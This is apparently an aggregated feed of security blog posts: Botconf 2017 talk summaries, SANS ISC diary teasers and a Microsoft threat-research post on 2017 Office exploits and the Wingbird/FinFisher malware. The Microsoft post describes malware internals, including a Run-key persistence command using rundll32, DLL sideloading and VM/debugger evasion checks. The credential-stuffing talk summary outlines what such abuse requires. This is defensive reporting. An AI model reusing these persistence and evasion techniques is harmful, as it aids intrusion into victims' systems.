Then Mayank Dhiman & Will Glazier presented “Automation Attacks at Scale or Understanding ‘Credential Exploitation’“. There exists many tools to steal credentials on the Internet and others to re-use them to perform malicious activities (account takeover, fake accounts creation, shopping bots, API abuse, etc). They are many toolkits that were briefly reviewed: SentryMBA, Fraudfox, AntiDetect but also more classic tools like Hydra, curl, wget, Selenium, PhantomJS. The black market is full of services that offers configuration files for popular websites. According to the research, 10% of the Alexia top websites are a config file available on the black market (which describes how to abuse them, the API, etc). Top targets are gaming websites, entertainment and e-commerce. No surprise here. To abuse them, you need: a config file, stolen credentials and some IP addresses (for rotation) and some computing power. About credentials, they are quite easy to find, pastebin.com is your best friend. Note that they need good IP addresses, best sources are cloud services or compromised IoT devices or proxy farms. They gave a case study about the large US retailer that was targeted by 40K IP addresses from 61 countries. But how to protect organizations against this kind of attacks?

  • Analyze HTTP(S) requests and headers to fingerprint attack tools
  • Use machine learning to detect forged browser behaviour
  • Use threat intelligence
  • Data analytics (look for patterns)

The next one was “The Good, the Bad, the Ugly: Handling the Lazarus Incident in Poland” presented by Maciej Kotowicz. Maciej came back on a big targeted attack that occurred in Poland. This talk was flagged as TLP:AMBER. Sorry, no coverage. If you are interested, here is a link for more info about Lazarus.

 

After the (delicious) lunch, Daniel Plohmann presented his project: “Malpedia: A Collaborative Effort to Inventorize the Malware Landscape“. Malpedia can be resumed in a few words: Free, independent, resource labeled, unpacked, samples. The idea of Malpedia came two years ago during Botconf. The idea is to propose a high-quality repository of malware samples (Daniel insisted on the fact that quality is better than quantity) properly analyzed and tagged. Current solutions (botnets.fr, theZoo, VirusBay.io) still have issues to identify properly the samples. In the Daniel’s project, samples are classified by families. What is a malware family? According to Daniel, it’s all samples that belong to the same project seen from a developer’s point of view. After explaining the collection process, he gave some interesting stats based on his current collection (as of today, 2491 samples from 669 families). Nice project and access is available upon request (if you met Daniel IRL) or by vouching for other people. Malpedia is available here.

The next talk was… hard! When the speaker warns you that some slides will contain lot of assembler code, you know what to expect! “YANT – Yet Another Nymaim Talk” was presented by Sebastian Eschweiler. What I was able to follow: Nymain is a malware that uses very complex anti-analysis techniques to defeat researchers and analysts. The main technique used is called “Heaven’s Gate“. It is a mechanism to call directly 64-bits kernel core from 32-bit code. It is very useful to encrypt code, hide from static analysis tools and a nice way to evade sandbox hooks.

After the afternoon coffee break, Amir Asiaee presented “Augmented Intelligence to Scale Humans Fighting Botnets“. It started with a fact: today, they are too many malwares and too few researchers. So we need to automate as much as possible. Amir is working for a company that gets feeds of DNS request from multiple ISP’s. They get 100B of DNS queries per day! As the malwares are moving faster then yesterday, they use complex DGA, the lifetime of C&C is shorter, there is a clear need for quick analysis of all those data. Amir explained how they process this huge amount of data using NLP (“Natural Language Processing”).DNS Processing

The engineering challenge is to process all those data and to spot new core domain… when real tile is a key! Here is a cool video about the data processing. Then Amir explained some use cases. Two interesting examples: Bedep uses exchange rates as DGA seed… Some others have too much coalitions (ex: [a-z]{6}.com) which could lead to many false positives: what about akamai.com?

The last talk covered the Stantinko botnet: “Stantinko: a Massive Adware Campaign Operating Covertly since 2012” by Matthieu FAOU & Frédéric Vachon from Eset. It was a very nice review of the botnet. It started with some samples they received from a customer. They started the reverse engineering and, when you discover that a DLL, belonging to a MP3 encoder application, decrypts and load another one in memory, you are facing something very suspicious! They were able to sinkhole the C&C server and started further analysis. What about the persistence? The malware creates two Windows services: PDS (Plugin Downloader Service) and BEDS (Browser Extension Downloader Service).

Statinko Architecture

The purpose of the PDS is to compromise CMS (WordPress and Joomla), install a RAT and Facebook bot. The BEDS is a flexible plugins system to install malicious extensions in the browser. Stantinko has many interesting anti-analysis features: the code is encrypted with a unique key per infection. The analyze requires to find the dropper and aget a sample + related context. There is a fileless plugin system. To get payloads, they had to code a bot mimicking an infected machine. What about the browser extension? The Ad-Fraud injects ads on targeted websites or redirect the user to an ads websites before showing the right one. They also replace ads with their own. Note that URL’s are hashed in the config files! Another module is the search parser which search on Google or Yandex for potential victims to perform brute-force attacks. Finally, a RAT module is also available. This bot has a estimate size of 500K hosts. More details about Stantinko are available here.

The day ended with a good lightning talks sessions: 14 presentations  in 1h! Some of them were really interesting, others very funny. In bulk mode, what was presented:

  • The Onyphe project
  • IoT Malware classification
  • Dropper analysis (https://malware.sekoia.fr)
  • Deft Linux (Free DFIR Linux distribution) DART deftlinux.net
  • Sysmon FTW
  • PyOnyphe: Onyphe Python library to use the API
  • Autopwn
  • Just a normal phishing
  • Context enrichment for IR
  • Yet another sandbox evation “you_got_damn_right” HTTP header gist.github.com/bcse/1834878
  • Sysmon sigs for Linux honeypots
  • Malware config dynamic extraction (Gootkit)
  • IDA Appcall
  • A Knightcrawler demo (see above)

See you tomorrow for the last day!

[The post Botconf 2017 Wrap-Up Day #2 has been first published on /dev/random]



from Xavier

Wednesday, December 6, 2017

Botconf 2017 Wrap-Up Day #1

We reached December, it’s time for another edition of the Botconf security conference fully dedicate to fighting botnets. This is already the fifth edition that I’m attending. This year, the beautiful city of Montpellier in the south of France is hosting the conference. I arrived on Monday evening to attend a workshop yesterday about The Hive, Cortex and MISP. As usual, I’m following the talks to propose you a wrap-up. Let’s go for the first one!

The introduction was not performed by “The Boss” (Eric Freyssinet) who was blocked due to a last minute change in his work agenda. But, the crew was there to ensure a smooth event. What about the current edition? In a few numbers: 4 days, 3 workshops, 12 crew members, 300 attendees (+13%), 28 talks selected amongst 46 submissions and good food as usual. Some attendees already renamed the event in “Bouffeconf” (“bouffe” is a French expression which expresses a huge amount of food). They also insisted on the respect of the social network and TLP policies.

The keynote slot was presented by Sébastien Larinier and Robert Erra. The title was “How to Compute the Clusterization of a Very Large Dataset of Malware with Open Source Tools for Fun & Profit?” and presumes a talk being oriented to machine learning. And it was indeed the case, the word appeared quickly on a slide. It was quite hard for a keynote with many mathematics formulas. The idea behind Sébastien and Robert’s research was to solve the following problem: Based on a data set of a few millions of malware samples how to process them automatically to classify them in clusters or families and get more information about their differences. In such a complex task, the scalability is important but also the speed. The schema to process the samples is the following:

blob >> parser >> JSON data >> FV (Features Vector) >> Classification

They explained the available algorithms (KMeans and DBScan) and their differences. Read the links if you are interested. Then they explained the issues they faced and finally gave some statistics.

Malware Clustering

They also explained the architecture deployed to parse all those samples. But what is stored? A lot of information: Hashes, the size and number of sections, names, entropy, characteristics, resources, entry point, import/export tables, strings, certificates, compilation date, etc. It is a good research that is still ongoing. Note that Sébastien has a workshop on this topic that he’s giving here and there at security conferences.

The first talk was titled “Get Rich or Die Trying” by Or EshedMark Lechtik from Checkpoint. It started with a fact: Many researches started with a simple finding like an email… that is the “trigger”. In this case, the research performed by Checkpoint started from an email about an oil company (Aramco) and targeting Saudi Arabia. Was it an APT? The investigations revealed step by step that it was not really an APT. They explained every step of the case from the email to the different malware samples delivered via malicious Office documents.

Attacker Infrastructure

One of them was a NetWire Lite, a RAT sold by wordwirelabs.com. The second sample was a VB6 compiled program which was an info stealer (ISR Stealer). The next one was an HawkEye keylogger which steals FTP, HTTP, SMTP credentials but also… Minecraft!? Don’t ask why! These tools are definitively not present in an APT… So they degraded the incident level. While going further, they finally found the Nigerian guy behind this attack. The main conclusion at the end of this talk could be: This guy was able to create a big operation and to cause damages with limited skills set. What about a group of highly skilled people?

The next slot was assigned to “Exploring a P2P Transient Botnet – From Discovery to Enumeration” from Renato Marinho, a researcher and SANS ISC handler. Renato explained how he found a botnet and how he was able to reverse the communications with the C&C. How it started? Simply with a Raspberry Pi running a honeypot at his home. The device was quickly infected (using the default Pi credentials) and he saw that the device tried to established a lot of connections to the Internet. Tip: when you’re running a honeypot, block (but log!) all connections to the wild Internet. He found that each member of the botnet could be a “Checker” or a “Scaro“, just one of them of both at the same time. A “Checker” is a dump node while a “Scaro” is a C&C. Communications with the C&C were established via HTTPS but the certificate was found in the binary. In this case, it’s easy to play MitM and intercept all communications. The set of commands was quite limited (“POST /ping”, “GET /upgrade”). The next step was to estimate the botnet size. The first techniques were to crawl the botnet based on the IP addresses found in communications with the C&C. The second one was more interesting: Renato found that it was possible to become the botnet by changed some parameters in the communication protocol (this is easy to achieve via a tool like BurpSuite). Another interesting fact about this botnet: there was no persistence mechanism in place which means that a reboot will remove the malware… until the next infection! Very interesting research!

Then, Jakub Křoustek, Peter Matula, Petr Zemek, from Avast, presented a very nice tool called RetDec. This is an open-source machine code decompiler. The first part of the talk was easy to understand. When a program (source) is compiled, the compiler generates machine code but also optimizes and changes reorganizes how data is managed. When you use a decompiler, you’ll get a code that is readable but that is far away from the original code. Usually, unreadable. They are also other techniques that make decompilation a hard work: packers, obfuscation, anti-debugging techniques, etc. RetDec is trying to solve those issues… The goal is to make a generic decompilation of binary code. That was the easy part. In the second part of the talk, they explained in details how the decompiler does the job with many examples. It was really complex. I just trust them. RetDec can do a good job. The good news is that it will be released as an open-source project next week. Check on retdec.com for more details. A good point for the IDA debugging plugin that can interact directly with RetDec! Impressive work by the Avast team…

After a long half-day, the lunch break was welcome. The afternoon started with “A Silver Path: Ideas for Improving Lawful Sharing of Botnet Evidence with Law Enforcement” by Karine e Silva from the University of Tilburg, NL. Not a technical talk at all but Karine has a very good overview of the issues between security researchers and law enforcement agencies. Indeed, by the law, attacking people or getting access to non-authorized data is prohibited. But in case of a botnet (just an example), the help of the researcher could be positive to help the LEA to take down the C&C server. The project presented by Karine is called BotLeg (more information here):

The project is a consortium between TiU (TILT), SURFNet, SIDN, Abuse Information Exchange, and NHTCU. While the main focus of the research is the Netherlands, the project will develop a comparative analysis to include other EU countries. The project is financed via NWO and will last for 48 months. Among the expected legal research results, the BotLeg project will deliver sectorial guidelines and codes of conduct on anti-botnet operations.

Karine on Stage

 

Some points are quite difficult to address. Example: in some cases, hack back is allowed but must be performed with the same level as the original attacker did. That’s not easy to quantify. What as an “aggressive” attack? Of course, the GDPR was mentioned because researchers are also collecting sensitive data.

The next talk was presented by two guys from the CERT.pl (Jarosław Jedynak & Paweł Srokosz): “Use Your Enemies: Tracking Botnets with Bots“. Usually, bots are used for malicious activities but they can be used for many purposes. Collected data are used to identify and kill them. They explained the infrastructure they developed to analyze malware samples, decrypt C&C configurations and then act as a member of the botnet to gain more knowledge. Their Ripper is, in fact, a modified version of Cuckoo + homemade scripts.

Automated Malware Analysis Tool Chain

Interesting to notice that performing this can be directly related to the previous talk: personal or sensitive information can be found. Once information about the botnet discovered, it’s not always easy to infiltrate it because you need to look legitimate (hostname, behavior, uptime), wait some time before being able to fetch data, and sometimes configuration is one available on specific countries.

The next talk was similar to the previous one. It focused on SOCKS proxies. “SOCKs as a Service, Botnet Discovery” by Christopher Baker. IP addresses can be easily classified. They are blacklists, GeoIP databases, DNS, CGN, websites etc. It’s easy to block them. But some IP addresses are very difficult to block because it could affect too many people (example: cloud services or ISP’s). That’s why there is a (black) market of SOCKS proxies. This is really a pain for researchers or law enforcement agencies because many SOCKS proxies are running on compromised computers in homes. Christopher explained how easy it is to “rent” such services for a small fee. In the second part of his talk, he explained how he infiltrated SOCKS proxies networks to gather more information about them. If I understood correctly, he used controlled hosts to join networks of proxies and see what was passing through them. Like deploying a tor-exit node.

After the afternoon coffee break, Sébastien Mériot from OVH presented “Automation Of Internet-Of-Things Botnets Takedown By An ISP“. For an ISP, DDoS attacks can be catastrophic. Not only they suffer from DDoS but some C&C servers can be hosted inside their infrastructure and, regarding the law, they can’t have a look at their customers’ data. Working based on abuse reports isn’t useful because it generates a lot of noise, they are often incomplete or the malicious content is already gone. IoT botnets have been a pain during the last year and generate a lot of DDoS attacks. Finding them is not complicated (Shodan is your best friend) but how to recover information about the C&C servers? Sébastien explained how he’s performing some reverse engineering to extract juicy information. I like the way he uses Radare2 with the r2pipe to get the assembly code of the sample and perform some greps to search for patterns of assembly code handling domains or IP addresses.

Then, Pedro Drimel Neto (Fox-It) came on stage to present “The New Era of Android Banking Botnets“. It was an interesting review of some banking malware families that spread during the last years: Perkele, iBanking, GMbot and BankBot. For each of them, he reviewed the infection path, the C&C communications, the backend. If in the previous years, unencrypted communications occurred via SMS, today it’s quite different and the latest malware families are much better (from an attacker perspective): strong encryption, anti-analysis, packing, C&C communications, e, c. Also, the distribution methods changed.

The last talk was an excellent review of the Gooligan botnet: “Hunting Down Gooligan” by Elie Bursztein & Oren Koriat. What is Gooligan? It was the first large-scale OAuth stealing botnet. Being used by all major actors on the Internet (Google, Microsoft, Facebook, Twitter, etc) you can imagine the impact of this botnet. The first version was detected in 2015 by Checkpoint and it was taken down in November 2016. In a nutshell, it was distributed as a repackaged known APK.

Gooligan in a Nutshell

Once decoded, the payload is downloaded, devices are rooted and persistence is configured. It modifies the install-recovery.sh file used when resetting the phone to factory settings. It makes very difficult to get rid of the malware. After technical details, the speakers explained the monetization techniques used by the botnet. There was two: apps boosting and ads injection. Stolen OAuth tokens were used interact with the play store to generate fake installs, reviews and search. Indeed, real users on real phones are difficult to spot compared to “fraudulent” server. As the C&C server got all details to spoof the infected phones (IMEI, IMSI, brand, model, token, Android version, etc). The last step was to explain how the remediation was performed: The C&C server was sinkholed and stolen token revoked. All users were notified, which is a challenge based on the number of people (1M), different languages, technical skills etc. I really like this presentation.

The day finished with beers and pizza in a relaxed atmosphere. Stay tuned for a second wrap-up tomorrow!

[The post Botconf 2017 Wrap-Up Day #1 has been first published on /dev/random]



from Xavier

Saturday, December 2, 2017

[SANS ISC] Using Bad Material for the Good

I published the following diary on isc.sans.org: “Using Bad Material for the Good“:

There is a huge amount of information shared online by attackers. Once again, pastebin.com is a nice place to start hunting. As this material is available for free, why not use it for the good? Attackers (with or without bots) are constantly looking for entry points on websites. Those entry points are a good place to search, for example, for SQL injections… [Read more]

[The post [SANS ISC] Using Bad Material for the Good has been first published on /dev/random]



from Xavier

Friday, December 1, 2017

[SANS ISC] Phishing Kit (Ab)Using Cloud Services

I published the following diary on isc.sans.org: “Phishing Kit (Ab)Using Cloud Services“:

When you build a phishing kit, they are several critical points to address. You must generate a nice-looking page which will match as close as possible to the original one and you must work stealthily to not be blocked or, at least, be blocked as late as possible… [Read more]

[The post [SANS ISC] Phishing Kit (Ab)Using Cloud Services has been first published on /dev/random]



from Xavier

Wednesday, November 29, 2017

[SANS ISC] Fileless Malicious PowerShell Sample

I published the following diary on isc.sans.org: “Fileless Malicious PowerShell Sample“:

Pastebin.com remains one of my favourite place for hunting. I’m searching for juicy content and report finding in a Splunk dashboard:

Yesterday, I found an interesting pastie with a simple Windows CMD script… [Read more]

[The post [SANS ISC] Fileless Malicious PowerShell Sample has been first published on /dev/random]



from Xavier

"How Can I Tell This is an Attack? - Amazon Support Phish"

Quite a few folks have been asking how can they tell this Amazon email is a Phish. Below are the indicators. I like this example as it demonstrates how the bad guys are constantly evolving and adapting in their attacks. Notice in thisemail how there is no malicious link or infected attachment to click on, &hellip; Continue reading How Can I Tell This is an Attack? - Amazon Support Phish

from lspitzner

Thursday, November 23, 2017

[SANS ISC] Proactive Malicious Domain Search

I published the following diary on isc.sans.org: “Proactive Malicious Domain Search“:

In a previous diary, I presented a dashboard that I’m using to keep track of the DNS traffic on my networks. Tracking malicious domains is useful but what if you could, in a certain way, “predict” the upcoming domains that will be used to host phishing pages? Being a step ahead of the attackers is always good, right? Thanks to the CertStream service (provided by Cali Dog Security), you have access to a real-time certificate transparency log update stream… [Read more]

 

[The post [SANS ISC] Proactive Malicious Domain Search has been first published on /dev/random]



from Xavier

Tuesday, November 21, 2017

ISC Top-100 Malicious IP: STIX Feed Updated

Based on my previous ISC SANS Diary, I updated the STIX feed to answer the requests made by some readers. The feed is now available in two formats:

  • STIX 1.2 (XML) (link)
  • STIX 2.0 (JSON) (link)

There are updated every 2 hours. Enjoy!

[The post ISC Top-100 Malicious IP: STIX Feed Updated has been first published on /dev/random]



from Xavier

Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks

The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how Office 365 Advanced Threat Protection, Windows Defender Advanced Threat Protection, and Windows Defender Exploit Guard protect customers from these exploits.

Exploit attacks in Fall 2017

The discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like ransomware and info stealers to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.

The Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.

CVE-2017-0199

CVE-2017-0199 is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the htafile OLE object, was fixed in April 2017 security updates.

Figure 1. CVE-2017-0199 exploit code

Ever since FireEye blogged about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and lastModifiedBy attributes help identify the use of such toolkits in generating exploit documents.

Figure 2. Exploit kit identifier

A slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch scriptlets (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.

Figure 3. PPSX activation for script moniker

CVE-2017-8570

The July 2017 security update from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, CVE-2017-8570, which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the public availability of exploit toolkit created a wave of malicious PPSX attachments.

CVE-2017-8759

In September 2017, FireEye discovered another exploit used in targeted attacks. The CVE-2017-8759 exploit takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the September 2017 security update. The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.

The CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.

Figure 4. CVE-2017-8759 exploit

CVE-2017-11826

Finally, onSeptember 28,2017, Qihoo 360 identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the October 2017 security update. The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.

Figure 5. CVE-2017-11826 exploit

Payloads

Except for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.

As cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:

  • Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.

  • Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.

In most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.

Figure 6. PowerShell payload from the HTA file

However, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.

WingBird (also known as FinFisher)

Wingbird is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group NEODYMIUM is known to use this malware in their attack campaigns.

The group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our previous blog post on CVE-2017-8759. So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a blog:

  • CVE-2015-5119 (Adobe Flash)
  • CVE-2016-4117 (Adobe Flash)
  • CVE-2017-8759 (Microsoft Office)
  • CVE-2017-11292 (Adobe Flash)

The interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.

The Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:

  • Sandbox environment checks
    • Checks if the malware is executed under the root folder of a drive
    • Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents

  • Fingerprinting check
    • Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources
  • VM detection
    • Checks if the machine hardware IDs are VmBus in case of HyperV, or VEN_15AD in case of VMware, etc.
  • Debugger detection
    • Detects debugger and tries to kill it using undocumented APIs and information classes (specifically ThreadHideFromDebugger, ProcessDebugPort, ProcessDebugObjectHandle)

The latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:

  • [randomName].cab –Encrypted configuration file
  • setup.cab – The last PE code section of the setup module; content still unknown
  • d3d9.dll –Malware loader used on system with restricted privileges; the module is protected by a VM
  • aepic.dll (or other name) – Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM
  • msvcr90.dll – Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM
  • [randomName].7z – Encrypted network plugin, used to spy the victim network communications
  • wsecedit.rar – Main malware dropped executable, protected by a VM

In the sample we analyzed, the command was 3, which led the malware to create a global event, 0x0A7F1FFAB12BB2, and drop malware components under a folder located in %ProgramData%, or in the %APPDATA% folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “{Random value taken from config file}”
With data: “C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN”

If the startup command is 2, the malware copies explorer.exe in the local installation directory, renames d3d9.dll to uxtheme.dll, and creates a new explorer.exe process that loads the malware DLL in memory using the DLL sideloading technique.

All of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.

Given the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.

Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite

Microsoft Office 365 Advanced Threat Protection blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:

Figure 7. Office 365 ATP detection

Customers using Windows Defender Advanced Threat Protection can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.

Figure 8. Windows Defender ATP alert

In addition, enterprises can block malicious documents using Windows Defender Exploit Guard, which is part of the defense-in-depth protection in Windows 10 Fall Creators Update. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).

Figure 9. Windows Defender Exploit Guard detection

Crimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.

AtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.



from Eric Avena